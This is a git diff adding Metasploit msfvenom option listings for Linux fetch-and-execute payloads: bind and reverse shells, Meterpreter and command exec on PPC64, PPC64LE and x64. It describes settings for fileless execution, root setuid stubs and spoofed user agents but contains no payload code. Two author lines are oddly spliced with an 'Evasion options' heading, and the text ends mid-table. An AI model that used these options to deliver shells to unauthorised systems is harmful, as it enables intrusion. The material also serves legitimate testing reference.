b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt @@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vRPiJbIWuxG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt new file mode 100644 index 0000000..f0791c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt @@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 23590 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GpPkBKxBZbnd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..7a20fed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AtxdiUGw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..bb8e08b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ssRObbfaiI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..598147b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zpXXDAbAdXJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..66c781f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sraqFjpIFkj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-exec.txt b/msfvenom/payload_options/cmd-linux-http-x64-exec.txt new file mode 100644 index 0000000..765ab62 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-exec.txt @@ -0,0 +1,71 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EgLoNCydek no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..20a7dc5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Brent Cook + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- 